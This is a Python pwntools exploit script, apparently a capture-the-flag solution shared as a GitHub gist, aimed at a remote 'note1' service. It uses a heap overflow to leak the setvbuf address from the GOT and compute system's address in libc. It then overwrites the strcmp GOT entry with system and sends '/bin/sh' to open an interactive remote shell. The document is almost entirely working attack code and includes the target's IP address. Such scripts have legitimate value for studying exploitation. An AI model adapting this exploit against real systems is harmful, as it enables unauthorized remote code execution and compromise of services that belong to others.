#!/usr/bin/env python | |
# coding=utf8 | |
from pwn import p64, ELF, process, remote | |
from struct import unpack | |
from time import sleep | |
# p = process('./note1') | |
p = remote('115.28.27.103', 9001) | |
elf = ELF('./libc-2.19.so') | |
strcmp_got = 0x602048 | |
setvbuf_got = 0x602060 | |
system_offset_to_setvbuf = elf.symbols['system'] - elf.symbols['setvbuf'] | |
p.sendline('1') | |
p.sendline('1') | |
p.sendline('1') | |
p.sendline('1') | |
p.sendline('1') | |
p.sendline('2') | |
p.sendline('2') | |
p.sendline('2') | |
p.sendline('1') | |
p.sendline('3') | |
p.sendline('3') | |
p.sendline('3') | |
# edit the first note to make heap overflow then leak stack address(setvbuf) | |
p.sendline('3') | |
p.sendline('1') | |
p.sendline('A' * 280 + p64(setvbuf_got - 0x70) + '2') | |
p.sendline('2') | |
p.recvuntil('content=') | |
p.recvuntil('content=') | |
p.recvuntil('content=') | |
setvbuf_addr = unpack('Q', p.recv(6) + '\x00'*2)[0] | |
print '[*] setvbuf_addr: ' + hex(setvbuf_addr) | |
# edit the second note to modify the strcmp_got to system | |
p.sendline('3') | |
p.sendline('2') | |
p.sendline('A' * 280 + p64(strcmp_got - 0x70) + '3') | |
p.sendline('3') | |
p.sendline('\x00') | |
p.sendline(p64(setvbuf_addr + system_offset_to_setvbuf)) | |
# trigger strcmp | |
p.sendline('3') | |
p.sendline('/bin/sh') | |
sleep(0.1) | |
p.clean() | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment